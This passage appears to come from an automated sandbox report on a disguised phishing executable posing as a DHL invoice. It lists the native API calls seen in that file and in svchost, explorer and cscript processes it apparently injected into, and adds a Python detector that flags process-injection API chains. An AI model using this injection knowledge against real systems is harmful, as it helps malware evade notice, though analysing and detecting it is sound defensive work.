Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208F9F0 NtClose,LdrInitializeThunk, 4_2_0208F9F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_0208FED0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FFB4 NtCreateSection,LdrInitializeThunk, 4_2_0208FFB4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FC60 NtMapViewOfSection,LdrInitializeThunk, 4_2_0208FC60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FD8C NtDelayExecution,LdrInitializeThunk, 4_2_0208FD8C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FDC0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_0208FDC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02090048 NtProtectVirtualMemory, 4_2_02090048
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02090060 NtQuerySection, 4_2_02090060
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02090078 NtResumeThread, 4_2_02090078
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0209010C NtOpenDirectoryObject, 4_2_0209010C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020901D4 NtSetValueKey, 4_2_020901D4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02090C40 NtGetContextThread, 4_2_02090C40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020910D0 NtOpenProcessToken, 4_2_020910D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02091148 NtOpenThread, 4_2_02091148
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FA20 NtQueryInformationFile, 4_2_0208FA20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FA50 NtEnumerateValueKey, 4_2_0208FA50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FBE8 NtQueryVirtualMemory, 4_2_0208FBE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208F8CC NtWaitForSingleObject, 4_2_0208F8CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208F938 NtWriteFile, 4_2_0208F938
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02091930 NtSetContextThread, 4_2_02091930
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FE24 NtWriteVirtualMemory, 4_2_0208FE24
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FEA0 NtReadVirtualMemory, 4_2_0208FEA0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FF34 NtQueueApcThread, 4_2_0208FF34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FFFC NtCreateProcessEx, 4_2_0208FFFC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FC30 NtOpenProcess, 4_2_0208FC30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FC48 NtSetInformationFile, 4_2_0208FC48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FC90 NtUnmapViewOfSection, 4_2_0208FC90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FD5C NtEnumerateKey, 4_2_0208FD5C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02091D80 NtSuspendThread, 4_2_02091D80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009A350 NtCreateFile, 4_2_0009A350
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009A400 NtReadFile, 4_2_0009A400
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009A480 NtClose, 4_2_0009A480
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009A530 NtAllocateVirtualMemory, 4_2_0009A530
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009A47A NtClose, 4_2_0009A47A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005BA036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 4_2_005B9BAF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005BA042 NtQueryInformationProcess, 4_2_005BA042
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_005B9BB2
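The Nt* entries above list one native API per function at two bases (0x0072Fxxx and 0x0073xxxx in svchost.exe, 0x0208Fxxx and 0x0209xxxx in cscript.exe), and the chains at 2_2_0038A036, 4_2_005BA036 and 4_2_005B9BAF are the injection primitives the signatures refer to. The Python below is an added example, not part of this report: it parses Code function lines, flags the API combinations that make up thread-context hijacking with a queued APC and section mapping, and compares the low 16 bits of function addresses between two processes. The rule names are this example's own, and the reading that matching offsets indicate the same image mapped in both processes is an inference from the addresses, not something the report states. The sample lines are copied from this section.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample: "Code function" lines copied from the report section above.
CODE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A350 NtCreateFile, 2_2_0041A350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007300C4 NtCreateFile,LdrInitializeThunk, 2_2_007300C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_0072FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 2_2_0038A036
Source: C:\Windows\explorer.exe Code function: 3_2_0909EE12 NtProtectVirtualMemory, 3_2_0909EE12
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020900C4 NtCreateFile,LdrInitializeThunk, 4_2_020900C4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_0208FAD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009A350 NtCreateFile, 4_2_0009A350
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005BA036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 4_2_005B9BAF
"""

# "<proc>_<run>_<addr> <api>,<api>,..., <proc>_<run>_<addr>"
CODE_RE = re.compile(r"Code function: (\d+)_(\d+)_([0-9A-Fa-f]{8}) (\S+), \1_\2_\3")

# Native-API combinations that, seen inside one function, mark the injection
# primitives the report's signatures refer to (rule names are this example's own).
CHAIN_RULES = {
    "thread context hijack + APC queue": {"NtSetContextThread", "NtQueueApcThread", "NtResumeThread"},
    "section mapped into a process": {"NtCreateSection", "NtMapViewOfSection"},
}


def parse_code_functions(text: str) -> list[tuple[int, int, list[str]]]:
    """(process index, function address, API names) for every Code function line."""
    out = []
    for proc, _run, addr, apis in CODE_RE.findall(text):
        names = [a for a in apis.split(",") if a]
        out.append((int(proc), int(addr, 16), names))
    return out


def injection_indicators(records) -> dict[int, set[str]]:
    """Which CHAIN_RULES entry fires in which process index."""
    hits: dict[int, set[str]] = defaultdict(set)
    for proc, _addr, names in records:
        present = set(names)
        for label, needed in CHAIN_RULES.items():
            if needed <= present:
                hits[proc].add(label)
    return dict(hits)


def shared_image_offsets(records, proc_a: int, proc_b: int):
    """Functions that start with the same API and sit at the same offset within
    a 64 KiB-aligned block in both processes, at different absolute addresses.
    Image bases are 64 KiB aligned, so a function keeps the low 16 bits of its
    address wherever the same image is mapped; matches across two processes are
    consistent with one injected image present in both (an inference from the
    addresses, not a statement of the report)."""
    def table(proc):
        return {(names[0], addr & 0xFFFF): addr
                for p, addr, names in records if p == proc and names}

    ta, tb = table(proc_a), table(proc_b)
    matches = []
    for key in ta.keys() & tb.keys():
        if ta[key] != tb[key]:
            api, off = key
            matches.append((api, off, ta[key], tb[key]))
    return sorted(matches)


if __name__ == "__main__":
    recs = parse_code_functions(CODE_LINES)
    for proc, labels in sorted(injection_indicators(recs).items()):
        print(f"process {proc}: {', '.join(sorted(labels))}")
    for api, off, a, b in shared_image_offsets(recs, 2, 4):
        print(f"{api:28s} +0x{off:04X}  svchost 0x{a:08X}  cscript 0x{b:08X}")
```

On the ten sample lines the hijack rule fires for both svchost.exe (index 2) and cscript.exe (index 4), the section-mapping rule for cscript.exe only, and four functions (NtCreateFile twice, NtAllocateVirtualMemory, NtQueryInformationProcess) line up at identical low-order offsets in the two processes.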
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AD5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_012AD5EB
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_012A1201
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_012AE8F6
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01248060 0_2_01248060
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B2046 0_2_012B2046
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A8298 0_2_012A8298
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0127E4FF 0_2_0127E4FF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0127676B 0_2_0127676B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012D4873 0_2_012D4873
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0126CAA0 0_2_0126CAA0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0124CAF0 0_2_0124CAF0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01276DD9 0_2_01276DD9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0125CC39 0_2_0125CC39
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0125B119 0_2_0125B119
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012491C0 0_2_012491C0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0125D065 0_2_0125D065
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01261394 0_2_01261394
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01261706 0_2_01261706
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01247920 0_2_01247920
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0125997D 0_2_0125997D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012619B0 0_2_012619B0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0126781B 0_2_0126781B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01267A4A 0_2_01267A4A
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01261C77 0_2_01261C77
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01267CA7 0_2_01267CA7
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01261F32 0_2_01261F32
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012CBE44 0_2_012CBE44
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01279EEE 0_2_01279EEE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_001B35E0 0_2_001B35E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402D88 2_2_00402D88
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D593 2_2_0041D593
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00409E50 2_2_00409E50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EE2E 2_2_0041EE2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E793 2_2_0041E793
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0073E0C6 2_2_0073E0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0073E2E9 2_2_0073E2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0078A37B 2_2_0078A37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00742305 2_2_00742305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007663DB 2_2_007663DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007E63BF 2_2_007E63BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007C443E 2_2_007C443E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00786540 2_2_00786540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0075C5F0 2_2_0075C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007C05E3 2_2_007C05E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0078A634 2_2_0078A634
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007E2622 2_2_007E2622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0074E6C1 2_2_0074E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00744680 2_2_00744680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0074C7BC 2_2_0074C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0076286D 2_2_0076286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0074C85C 2_2_0074C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0078C920 2_2_0078C920
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007D49F5 2_2_007D49F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007569FE 2_2_007569FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007429B2 2_2_007429B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007E098E 2_2_007E098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007C6BCB 2_2_007C6BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007ECBA4 2_2_007ECBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007CAC5E 2_2_007CAC5E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007E2C9C 2_2_007E2C9C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0074CD5B 2_2_0074CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00770D3B 2_2_00770D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0075EE4C 2_2_0075EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00772E2F 2_2_00772E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00750F3F 2_2_00750F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007B2FDC 2_2_007B2FDC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007DCFB1 2_2_007DCFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007BD06D 2_2_007BD06D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0075905A 2_2_0075905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00743040 2_2_00743040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0076D005 2_2_0076D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007CD13F 2_2_007CD13F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007E1238 2_2_007E1238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00747353 2_2_00747353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0073F3CF 2_2_0073F3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0077D47D 2_2_0077D47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00775485 2_2_00775485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00751489 2_2_00751489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0074351F 2_2_0074351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007E35DA 2_2_007E35DA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007D771D 2_2_007D771D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007757C3 2_2_007757C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007C579A 2_2_007C579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007DF8EE 2_2_007DF8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007BF8C4 2_2_007BF8C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007C5955 2_2_007C5955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007C394B 2_2_007C394B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007F3A83 2_2_007F3A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00767B00 2_2_00767B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0073FBD7 2_2_0073FBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007CDBDA 2_2_007CDBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007DFDDD 2_2_007DFDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0076DF7C 2_2_0076DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007CBF14 2_2_007CBF14
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038A036 2_2_0038A036
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00381082 2_2_00381082
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038B232 2_2_0038B232
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038E5CD 2_2_0038E5CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00388912 2_2_00388912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00385B30 2_2_00385B30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00385B32 2_2_00385B32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00382D02 2_2_00382D02
Source: C:\Windows\explorer.exe Code function: 3_2_080E0036 3_2_080E0036
Source: C:\Windows\explorer.exe Code function: 3_2_080D7082 3_2_080D7082
Source: C:\Windows\explorer.exe Code function: 3_2_080D8D02 3_2_080D8D02
Source: C:\Windows\explorer.exe Code function: 3_2_080DE912 3_2_080DE912
Source: C:\Windows\explorer.exe Code function: 3_2_080E45CD 3_2_080E45CD
Source: C:\Windows\explorer.exe Code function: 3_2_080E1232 3_2_080E1232
Source: C:\Windows\explorer.exe Code function: 3_2_080DBB30 3_2_080DBB30
Source: C:\Windows\explorer.exe Code function: 3_2_080DBB32 3_2_080DBB32
Source: C:\Windows\explorer.exe Code function: 3_2_0909D232 3_2_0909D232
Source: C:\Windows\explorer.exe Code function: 3_2_09094D02 3_2_09094D02
Source: C:\Windows\explorer.exe Code function: 3_2_0909A912 3_2_0909A912
Source: C:\Windows\explorer.exe Code function: 3_2_09097B30 3_2_09097B30
Source: C:\Windows\explorer.exe Code function: 3_2_09097B32 3_2_09097B32
Source: C:\Windows\explorer.exe Code function: 3_2_090A05CD 3_2_090A05CD
Source: C:\Windows\explorer.exe Code function: 3_2_0909C036 3_2_0909C036
Source: C:\Windows\explorer.exe Code function: 3_2_09093082 3_2_09093082
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0209E2E9 4_2_0209E2E9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020A2305 4_2_020A2305
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020EA37B 4_2_020EA37B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_021463BF 4_2_021463BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020C63DB 4_2_020C63DB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0209E0C6 4_2_0209E0C6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02142622 4_2_02142622
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020EA634 4_2_020EA634
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020A4680 4_2_020A4680
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020AE6C1 4_2_020AE6C1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020AC7BC 4_2_020AC7BC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0212443E 4_2_0212443E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020E6540 4_2_020E6540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_021205E3 4_2_021205E3
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020BC5F0 4_2_020BC5F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0214CBA4 4_2_0214CBA4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02126BCB 4_2_02126BCB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020AC85C 4_2_020AC85C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020C286D 4_2_020C286D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020EC920 4_2_020EC920
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0214098E 4_2_0214098E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020A29B2 4_2_020A29B2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_021349F5 4_2_021349F5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020B69FE 4_2_020B69FE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020D2E2F 4_2_020D2E2F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020BEE4C 4_2_020BEE4C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020B0F3F 4_2_020B0F3F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0213CFB1 4_2_0213CFB1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02112FDC 4_2_02112FDC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0212AC5E 4_2_0212AC5E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02142C9C 4_2_02142C9C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020D0D3B 4_2_020D0D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020ACD5B 4_2_020ACD5B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02141238 4_2_02141238
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020A7353 4_2_020A7353
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0209F3CF 4_2_0209F3CF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020CD005 4_2_020CD005
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020A3040 4_2_020A3040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020B905A 4_2_020B905A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0211D06D 4_2_0211D06D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0212D13F 4_2_0212D13F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0213771D 4_2_0213771D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0212579A 4_2_0212579A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020D57C3 4_2_020D57C3
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020DD47D 4_2_020DD47D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020B1489 4_2_020B1489
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020D5485 4_2_020D5485
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020A351F 4_2_020A351F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_021435DA 4_2_021435DA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02153A83 4_2_02153A83
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020C7B00 4_2_020C7B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0212DBDA 4_2_0212DBDA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0209FBD7 4_2_0209FBD7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0211F8C4 4_2_0211F8C4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0213F8EE 4_2_0213F8EE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02125955 4_2_02125955
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0212394B 4_2_0212394B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0212BF14 4_2_0212BF14
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020CDF7C 4_2_020CDF7C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0213FDDD 4_2_0213FDDD
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009D593 4_2_0009D593
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009E793 4_2_0009E793
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00082D88 4_2_00082D88
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00082D90 4_2_00082D90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009EE2E 4_2_0009EE2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00089E50 4_2_00089E50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00082FB0 4_2_00082FB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005BA036 4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B1082 4_2_005B1082
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B8912 4_2_005B8912
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005BB232 4_2_005BB232
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B5B32 4_2_005B5B32
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B5B30 4_2_005B5B30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005B2D02 4_2_005B2D02
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_005BE5CD 4_2_005BE5CD
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: String function: 0125F9F2 appears 40 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: String function: 01260A30 appears 46 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: String function: 01249CB3 appears 31 times
